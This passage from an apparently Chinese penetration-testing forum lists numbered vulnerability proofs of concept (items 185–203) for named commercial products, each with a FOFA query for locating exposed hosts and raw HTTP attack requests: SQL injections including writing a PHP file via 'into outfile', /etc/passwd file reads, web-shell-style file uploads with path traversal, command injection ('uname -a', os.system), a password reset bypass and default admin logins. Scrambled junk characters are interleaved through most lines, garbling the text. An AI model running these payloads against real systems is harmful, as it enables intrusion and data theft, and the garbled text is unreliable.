X-Requested-With: XMLHttpRequest
( M# P4 m0 I/ Z$ o3 j* O  h
& h# A, j! e/ ]* n) E7 @; n# Z, F  O8 f# Q8 \( N
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
3 b0 V: T* t& B( P0 Y2 {0 h/ n/ I0 E3 H# I1 h

8 k3 \( D8 c- \- w185. 瑞友天翼应用虚拟化系统SQL注入
) x) [% c5 a5 M- |1 Lversion < 7.0.5.1$ L' a1 f. C4 e1 u" U( h/ S
FOFA：app="REALOR-天翼应用虚拟化系统"
* [! m8 \6 D/ u4 f& E, mGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1/ C* P! u4 k9 D( v$ c; V
Host: host/ i' a, s. ]! Y0 d1 |, Z
$ p; h6 }$ I& E* ]* \7 n# R

6 z- Z4 V/ y/ c' F. N/ X186. F-logic DataCube3 SQL注入
' @5 s0 A1 U; GCVE-2024-31750
! j2 |% k' R1 v# \# n! }2 cF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统* M, z  ^9 W4 l9 {  P# F% D
FOFA：title=="DataCube3"
  t5 k* b$ T& E0 {3 u, E* DPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
) ]2 @' _1 V3 }Host: your-ip/ O" C: g- ?, S! @0 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0/ {8 C# ?  x1 X- f- B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.85 K: U& S/ _& I0 ?& M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. @$ }- v/ A1 m: q  o+ h( p$ \  VAccept-Encoding: gzip, deflate
9 ?) p: U5 t! wConnection: close1 G5 Z) B$ ~' |  Z
Content-Type: application/x-www-form-urlencoded
* b* u3 A$ u3 S+ g5 R- c$ n6 L, S, @" @
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
/ {7 n+ f2 x5 O
4 I4 j5 h6 Y3 `8 s+ w3 w9 B3 P% U4 @$ F! c
187. Mura CMS processAsyncObject SQL注入' W( s* D) J# a4 j( C: E
CVE-2024-32640# O8 E# p/ a- M$ l9 v8 t
FOFA："Mura CMS"% R3 G7 y- Q( z' G
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
# k$ e' y+ I9 P! }7 v2 \1 sHost: your-ip5 `6 {# W4 h2 k1 M  t! l
Content-Type: application/x-www-form-urlencoded
  y' M7 f7 J9 ~& a- `9 T9 i
+ b; V" b+ j# ^# m6 _1 W+ k4 d6 g' u: A
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1- o/ P, z' I6 @( j; C% |* Y5 Y
7 Q: l; k; W+ u" H/ w$ n
3 a+ U( I9 I' H9 D& d
188. 叁体-佳会视频会议 attachment 任意文件读取1 U. a: h  i. |6 Y: F) B
version <= 3.9.76 k: ^( t! H4 N% p9 a6 p
FOFA：body="/system/get_rtc_user_defined_info?site_id"
# C+ V6 w  K3 r+ lGET /attachment?file=/etc/passwd HTTP/1.1' X# L$ }( b; t6 u0 V
Host: your-ip1 ]0 n' r' O' W1 m$ a; R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 r9 z5 M( ~' }. g: xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 |  H' ?1 C. a$ G. m
Accept-Encoding: gzip, deflate
2 Z' t* Y. F+ iAccept-Language: zh-CN,zh;q=0.9,en;q=0.8+ O* N/ Y! ]. B6 \7 y  _5 _8 Z
Connection: close
+ ^% v! Q, C9 X. V' ]; \/ `% N4 Y3 U9 O* H
7 Q7 r2 |. A3 k/ P0 F
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
0 s9 K5 N9 h2 V" g2 x" `FOFA：app="LANWON-临床浏览系统": c# T) v, t2 `- m* F9 c2 o
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
. M0 O4 @6 }4 s& zHost: your-ip
7 D8 x2 X+ r2 [8 Q. t; @* OUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 z  Q# @4 i& F) y! ?8 `) r0 Q3 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 ?# }3 C' s2 t' H  y6 R! b2 c) A
Accept-Encoding: gzip, deflate
* M' s  x$ O4 e' M: [) AAccept-Language: zh-CN,zh;q=0.9$ b- V4 \3 l' \. j
Connection: close
# i' B" G& k  D2 S
/ {/ `5 W0 X6 D% ?3 r2 T: m1 j2 f6 z2 l, N9 v# S
190. 短视频矩阵营销系统 poihuoqu 任意文件读取( a* ]2 {3 y( h% e( L! b7 d% P
FOFA：title=="短视频矩阵营销系统"$ N3 M; i; s4 r' q4 r0 y7 s
POST /index.php/admin/Userinfo/poihuoqu HTTP/2% u$ o2 {# d, [4 {3 i
Host: your-ip
' T: y8 [6 D* q  X: {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
1 [$ v& P$ T5 J( LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, L1 X6 c3 ?; h3 W9 F4 B/ l; }
Content-Type: application/x-www-form-urlencoded
; q3 z8 T2 K& ~7 o* i+ w1 A- cAccept-Encoding: gzip, deflate' c, e4 K, U' @" [+ s
Accept-Language: zh-CN,zh;q=0.9* X% h8 d6 }: M0 x- \

& ]% \: q+ z4 f2 O3 D) fpoi=file:///etc/passwd
( a. [9 x: c4 p2 c
$ V4 g# ]5 W1 h  C! c: x: A
: D, ?# \9 b$ j191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入" r# S: ~# b- y$ y
FOFA：body="/CDGServer3/index.jsp"+ x6 k" V2 n/ O( v- Q  m
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
& K( S6 E2 |! t" u+ @! `6 XHost: your-ip
8 @0 V: t6 ^4 e3 y3 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 f/ J/ }: O/ T7 t3 y
Content-Type: application/x-www-form-urlencoded  m2 V: y# u; |; a9 Z7 f
3 L' w7 p8 f- n' f( j/ i
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=, t6 l0 o' G* K1 u  G' [5 \  T
" p# s$ V: ~( I6 B3 j
8 m8 d2 @" S) y+ d
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传) ~+ Y! P9 t/ f; I7 i# ^
FOFA：title="用户登录_富通天下外贸ERP"+ x, n, {6 i+ T" E) D" `3 E% b* _
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
% |& q& I; T! U0 K7 jHost: your-ip
2 V- Z; d, _1 y0 ]. b1 s$ ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
% G& b. o7 g' W" BContent-Type: application/x-www-form-urlencoded
. ]: @) {, d' Z( X% y& A; o9 g8 g* m& N7 F6 e
+ N; _. L9 n$ w! O2 @" `/ [
<% @ webhandler language="C#" class="AverageHandler" %>" g! B" n* k( K6 W: W
using System;
' f( T/ {8 k' c# r+ jusing System.Web;) H* @& q+ }  a0 j5 {4 P& |
public class AverageHandler : IHttpHandler5 Q  r7 y, H  G; ?7 u& r
{
) C8 l, Q  M5 v* K/ f4 e" kpublic bool IsReusable
' X2 a# |- O* @7 x. J5 s{ get { return true; } }5 ]* |4 m  v" F+ N9 I: Z0 Q: l6 ~+ a
public void ProcessRequest(HttpContext ctx)
7 v  \, d6 B% C1 w8 }{2 [' D; t" g6 Q0 L
ctx.Response.Write("test");, F# v6 B1 z  b. s8 R& j- S0 X
}6 m* c( [7 S" G0 o: k2 o
}
/ Y1 n( }5 ~" i! z5 Q! R) @; a  E  f! \* A! [; ?3 \8 {

1 |8 J# @$ R( B0 m2 K+ D  b% U193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
- o9 ], S+ J) P: k8 ~FOFA：body="山石云鉴主机安全管理系统"
, d3 C- m; I: Z* x( AGET /master/ajaxActions/getTokenAction.php HTTP/1.1% A8 g2 _/ M8 O: N8 J) |' K
Host:
6 N& }4 m% K& T/ M/ U6 nCookie: PHPSESSID=2333333333333;
! M8 ]" F/ L6 W' g7 E5 _Content-Type: application/x-www-form-urlencoded  Z3 s& A7 j; y
User-Agent: Mozilla/5.0
* d) j* H% [" n, n+ e5 w
5 ~. d* X$ |% J3 F( l8 {4 T- l# m' m8 b/ v
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1+ P0 A* r$ ^) o, G+ `! L
Host:1 \+ O% H* d! G
User-Agent: Mozilla/5.00 q4 k; t4 e. ^8 N
Accept-Encoding: gzip, deflate
4 O1 a* w+ v* E" l) XAccept: */** u# C! t7 V' M& a8 M. v. F. |; I
Connection: close. ~2 s8 F' u1 D' G0 d- B
Cookie: PHPSESSID=2333333333333;& |; Q) n. {) {* D; J5 p
Content-Type: application/x-www-form-urlencoded) H% K) e: O2 C8 Z! }
Content-Length: 84. ~' M/ L( q# y3 a. {
2 d( T/ R7 o0 g* {6 k
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')6 J7 P0 M4 j' F; p' I0 D
. G$ S+ K& ~% S* ~/ \
% N% {$ D! d# y. M
GET /master/img/config HTTP/1.15 G+ N# v! b, Y
Host:
& A3 Y2 _# y* M: [( e( L$ XUser-Agent: Mozilla/5.0+ ~" u$ F/ ^; ]- ?5 q. F# Q
- s) }/ v8 H/ M) @6 l

# I: t5 _) X* O. \6 P194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
/ ^! n- R/ P3 {" f4 HFOFA：app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
* g: `8 q5 g2 c6 S
: O+ d. Z' r+ D' j' m/ ~POST /servlet/uploadAttachmentServlet HTTP/1.1
2 j3 c$ [0 U. Y2 W4 c+ T% ZHost: host8 F! T8 r0 h7 d& l: [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
1 v0 ]6 e! y) A9 k# \6 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 ?/ \% I! P2 D, a/ i' s3 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ~6 S, K; D! H7 S1 ^
Accept-Encoding: gzip, deflate
5 X0 W% H8 Q+ `( ^# H! `8 p2 ?Connection: close
7 w9 E' l, r6 T* eContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk, H# g9 s/ P" S4 z+ ^
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ a1 A5 S; u$ u9 y% W2 a3 C+ H8 {
' ^, Y4 c( g/ v& {# \Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
1 J% b3 G9 x/ b: R8 m+ k+ eContent-Type: text/plain* t) I8 k$ p1 i1 g3 h" P& @
<% out.println("hello");%>
6 R1 |. }8 I3 k: M. h+ f9 b# v------WebKitFormBoundaryKNt0t4vBe8cX9rZk6 w( J0 r7 @* Z1 k
Content-Disposition: form-data; name="json"
% V$ p4 j, ?5 Z9 c6 l; i; O9 r. X {"iq":{"query":{"UpdateType":"mail"}}}' I) q7 e) X' [( w" J( g
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--$ J0 u' `& [0 [4 D* n( }& k

0 t+ G- W9 P8 z( b
3 Y& }' O2 m2 b+ r195. 飞鱼星上网行为管理系统 send_order.cgi命令执行# j  A$ d: _% @, |6 m# T& I$ e
FOFA：title=="飞鱼星企业级智能上网行为管理系统
' g/ }0 ~7 P  E% A2 IPOST /send_order.cgi?parameter=operation HTTP/1.1
8 F; S. N1 e6 R0 qHost: 127.0.0.1
2 ?+ A4 G% b) N0 mPragma: no-cache) X, f% n, ~8 _) @# s. {5 r
Cache-Control: no-cache
5 q8 @  L8 k- p" O5 p7 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) w; ?/ d0 M; x  _Accept: */*
1 S; T- m$ k# r8 S. p* J( cAccept-Encoding: gzip, deflate
' G+ B) u8 H6 u) Y" Q3 f" L; G( |Accept-Language: zh-CN,zh;q=0.9
0 Q: g& @( P# h- i/ E+ pConnection: close  Y. B, z: N' ^& Z1 M
Content-Type: application/x-www-form-urlencoded' J# v- P0 Q7 T$ u) A
Content-Length: 68
& b) {+ Z" E; E0 ~; y% T7 Z- i% Q3 _* G" z: ?: }5 x# v% D- v4 P
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}# ~% Y% N" o. A+ o9 T

( t/ O' s6 d' ^( l
0 n. @2 @( H, H0 A196. 河南省风速科技统一认证平台密码重置% G' L4 g; q0 R- Q2 Q0 q/ b6 ~
FOFA：body="/cas/themes/zbvc/js/jquery.min.js". d. @; H% {7 z5 H& g' M
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1( L( E0 m) J- u4 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! V5 x7 `3 l- B$ J6 c8 d8 j3 }3 H
Content-Type: application/json;charset=UTF-8
# P- a! {5 A7 \% o% ?8 U. KX-Requested-With: XMLHttpRequest
1 T  e  v4 F: s! i. E% R. |$ y( ^Host:
4 ~! R$ ]: ~5 E" p: z+ ~  Z+ n7 rAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2$ `/ ]0 P# a6 @2 T. I& P
Content-Length: 45. N$ t) p* c5 k9 Z
Connection: close
% h+ I% i- N/ b1 e) j# o
3 d7 T5 e) w. C7 v$ ^$ B{"xgh":"test","newPass":"test666","email":""}
. }3 B/ Q5 b; c1 Q& P7 a0 B( U8 F
" K6 D# t- c7 k/ u% c. d* K8 I) \
$ x0 R6 ?1 g: M3 U1 o) `
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
( }! q3 Q2 C2 a8 y6 U: mFOFA：app="浙大恩特客户资源管理系统"
5 M/ x  }! T! X9 _GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
: j, ^( N! D/ r. pHost:* Y. T$ w  z% _* M1 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
# A( |& }+ W- A1 `Accept-Encoding: gzip, deflate
  }1 J5 a' x/ L' J7 _Connection: close
( q8 Q/ D) P: Q4 g4 J) k& ?
# Z+ f1 x$ X) [) L& A% g! i0 r; Y& _

  r; n$ h9 |0 `# g5 |198.  阿里云盘 WebDAV 命令注入
0 K' k! t" T1 E5 U% Y2 U# OCVE-2024-29640
7 B/ Q# ?( ?( E2 GGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
2 Y& o) Y/ ^2 y2 w5 ~% Z+ p9 sCookie: sysauth=41273cb2cffef0bb5d0653592624cf64; L" j( n. s/ q0 r3 i* w4 R
Accept: */*
% }% X9 W) q- JAccept-Encoding: gzip, deflate
0 Q- t0 Q( |+ I4 }3 {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6; V4 k- C5 t) P' B
Connection: close# l" p/ v3 \9 U) F) o$ {8 v6 Q+ w

. X, [+ s% C/ _: g, D8 [' j+ f& m) [$ M
199. cockpit系统assetsmanager_upload接口文件上传" \  E& x0 {( l. p2 Z

  N  u* b0 J1 l, b0 M( v: @1.执行poc进行csrf信息获取，并获取cookie，再上传访问得到结果：: ]4 b* m9 T3 C6 R+ u
GET /auth/login?to=/ HTTP/1.1
1 G, c6 r  W# J) d( v9 g. Z* H5 y" C- w7 z7 N0 j' W
响应：200，返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"9 X. C4 K; C' s, @2 d! u
( E* n& R2 e2 }8 T
2.使用刚才上一步获取到的jwt获取cookie：
  Y& }% m# J: ^, _7 T$ V# d8 v$ |: |" u6 M1 l9 e) I8 L
POST /auth/check HTTP/1.1
! N' G5 R/ J4 X) E2 u2 CContent-Type: application/json
: _4 h6 N  J, h( f$ j  ]
4 f, M' _" {" @4 @) W9 L) q" V6 B{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}+ U4 M& `; n( A6 h/ [, X/ t
( g$ r: o9 @2 t2 M4 a
响应：200，返回值:% A7 ]* `" p, r( G$ q- [" W4 x
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
9 u1 ]0 G8 ]" q" J" xFofa：title="Authenticate Please!"
5 G+ I( X& p' I! k# SPOST /assetsmanager/upload HTTP/1.1
3 n+ u) B* B% [5 j  wContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
7 I5 O0 v7 ^" u4 k* r1 z9 wCookie: mysession=95524f01e238bf51bb60d77ede3bea928 g$ L2 Z% m1 l

5 x0 h/ a0 H+ \7 @$ q+ u5 }-----------------------------36D28FBc36bd6feE7Fb3
0 P" M: |9 u. v" G$ ^- a) xContent-Disposition: form-data; name="files[]"; filename="tttt.php"
1 [" D( A$ k7 [' |, ?  IContent-Type: text/php5 F3 i. F/ Z3 h4 o. t! M2 i
5 w' ^" c0 Y3 c8 y* s5 R( S
<?php echo "tttt";unlink(__FILE__);?>
& O: C+ }$ D4 e-----------------------------36D28FBc36bd6feE7Fb3# {7 v# O0 s# `
Content-Disposition: form-data; name="folder"
2 P0 p2 F# D# T, D
$ G* ^4 i) R5 b+ K4 Z( E. P-----------------------------36D28FBc36bd6feE7Fb3--3 O: H* a* R4 S% F' N
6 @5 v" I( p/ @9 y, o
5 y1 c# X, b4 Q: ?9 F6 e+ m
/storage/uploads/tttt.php4 ~- v, ^! H& c, T7 y$ L$ ?9 h
2 K5 N& q( Y7 Z+ ~5 ?' {
200. SeaCMS海洋影视管理系统dmku SQL注入
( R& X- `5 E, ?FOFA：app="海洋CMS"4 s7 \4 B* |5 J( w9 Z, [& W* x; g2 A0 o! p
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ i" J/ {* w/ z4 j
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
$ Q+ O+ g: O5 q/ K* @2 hUpgrade-Insecure-Requests: 1
3 F- U' C4 F3 k6 j/ J1 xCache-Control: max-age=0
1 w" x0 W6 K. P3 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 e( j- v; C7 R( C
Accept-Encoding: gzip, deflate
, g3 j% }0 `" VAccept-Language: zh-CN,zh;q=0.9
% M. w% l' }! e, F9 Q9 v' d8 @- v4 m& J! \% @+ p: }/ \

3 y" F( y: ~- K  I; I  M201. 方正全媒体新闻采编系统 binary SQL注入
9 H) o% S- X5 WFOFA：body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
1 S0 o& ?+ e6 B; ?3 T. PPOST /newsedit/newsplan/task/binary.do HTTP/1.1: p* w" _  v# w' X/ F  q/ t, {
Content-Type: application/x-www-form-urlencoded
& O$ s( Z- _$ D' P( e7 ^& `8 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% R+ F. U3 o/ K) F6 dAccept-Encoding: gzip, deflate+ J( {9 C7 ]2 H" d* w& N3 z; H& ^
Accept-Language: zh-CN,zh;q=0.9; Z3 |8 P! @& D0 N0 Q' e2 {
Connection: close
6 `4 g  u5 M; l& P) p0 s1 p% O, m7 x
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1) A3 Z6 r" z: ?) O3 s: ^  a7 B9 {

  N0 l2 b2 }, c8 b% s
7 J8 L1 `9 l. K8 c5 s202. 微擎系统 AccountEdit任意文件上传' k) v2 H& L) a
FOFA：body="/Widgets/WidgetCollection/"/ o2 L/ {3 L( p# q
获取__VIEWSTATE和__EVENTVALIDATION值
+ B3 u# G" Y% K- }+ S+ M6 W1 {GET /User/AccountEdit.aspx HTTP/1.1
, O  U' `+ u7 \9 wHost: 滑板人之家+ e5 Z3 _6 V% _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
  a6 W  l8 k. TContent-Length: 0. Q1 ?$ f3 ]5 E- r2 X3 C$ T
! \) c6 Y4 [$ ]: f
5 n6 p' l2 n7 F  F
替换__VIEWSTATE和__EVENTVALIDATION值. l4 o; l8 O5 }7 S9 f! t
POST /User/AccountEdit.aspx HTTP/1.1
* V% n- ~% k% L& Y  H4 T+ gAccept-Encoding: gzip, deflate, br
% m: V0 x( n' U0 B, xContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687+ `! S( o! G- s
8 ?+ s( V; t* E0 I9 X
-----------------------------786435874t385875938657365873465673587356872 A. a& e/ g8 F& \2 Z. x6 @0 S
Content-Disposition: form-data; name="__VIEWSTATE"
( M4 z* R4 }$ k9 T
% I9 p) D  `% k/ ?( y- @/ i. C__VIEWSTATE/ Y, C+ F4 o8 f: u
-----------------------------786435874t38587593865736587346567358735687
9 w, u* T- z5 B7 TContent-Disposition: form-data; name="__EVENTVALIDATION"
) U/ F8 D: w. X3 ?3 R
0 @" _. J/ d7 A7 O/ z* Y( N__EVENTVALIDATION0 r: X+ W) h3 E2 l0 h5 g3 J/ j
-----------------------------786435874t38587593865736587346567358735687
, ^( V1 M/ j% M4 o$ H: k) y# a: kContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
  ~4 q3 k( z  b. a) ~( a' n. cContent-Type: text/plain  w$ u/ t7 E, R6 o$ [0 `- N: _  |6 Q
7 x' T& _" O/ i: d; j
Hello World!
8 ?7 M9 y" b" O. f# P-----------------------------786435874t38587593865736587346567358735687
# a0 s# O! F2 S1 Q( u( y  FContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
3 _* _; h% K. N' \% U: l* |! T  N! ?: e% |' ?# ]2 V5 [
上传图片: A9 M* j1 E+ I1 q, _  k3 y; V2 T
-----------------------------786435874t38587593865736587346567358735687
* X# g6 k+ `' X0 `4 b; m* ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"! ]6 W9 S8 Q. n9 V0 y  d
$ a) i; S1 v0 ~$ J/ U* H  f

# }5 F" b- k7 @! S9 Z! M-----------------------------786435874t38587593865736587346567358735687
3 e; b0 L% Q5 Q- {Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
& _, L  |! M- y% o" F+ K0 Q" k$ i% a# o

, y7 Q" m- G" w9 Q+ U" g-----------------------------786435874t38587593865736587346567358735687--$ t, r$ n# ^& t! ?
" L4 R. E( p1 \' B6 f3 W: b+ Y0 B$ M
& y! m* n! a  x3 g
/_data/Uploads/1123.txt
# J! O  `# B2 ^
  ^) f9 J$ h& T7 p9 j( l3 O203. 红海云EHR PtFjk 文件上传0 c  \7 o6 Q" z  |# V
FOFA：body="RedseaPlatform"% M% i* n1 y9 ^. z
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
$ u8 c1 b5 G, i- qHost: x.x.x.x
4 N+ X. q$ B8 S4 I, Y" hAccept-Encoding: gzip
* r" }% b' y# S5 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, n( b1 S% g+ y: Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4) G1 t8 T: S/ P$ e# v
Content-Length: 210
& L" d7 i2 g8 s4 v' V5 _: \: F: y  V6 ]7 O# g+ g8 X0 V
------WebKitFormBoundaryt7WbDl1tXogoZys4
# L. y, b$ s7 @/ d1 `Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
9 B8 A0 S6 j4 e% T" p# r& bContent-Type:image/jpeg2 _4 b) y+ u" {* A6 X, @

# _  m+ i& r9 T# w: e. E<% out.print("hello,eHR");%>
3 p4 G' u* [' P, ]: j% {------WebKitFormBoundaryt7WbDl1tXogoZys4--$ @) l8 q0 n. v  ^+ K- a: A

( H: ^/ G. y* w4 T% Q6 ~ 5 c6 N8 e( W; U; M+ h! w
& @- L; A8 y+ J8 e2 H, f; |

% H9 l. p. f  j1 v9 D' h. w5 H1 h/ v  k/ _" c1 ]* V

* n0 q6 {6 E" v% Z' N9 ?

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)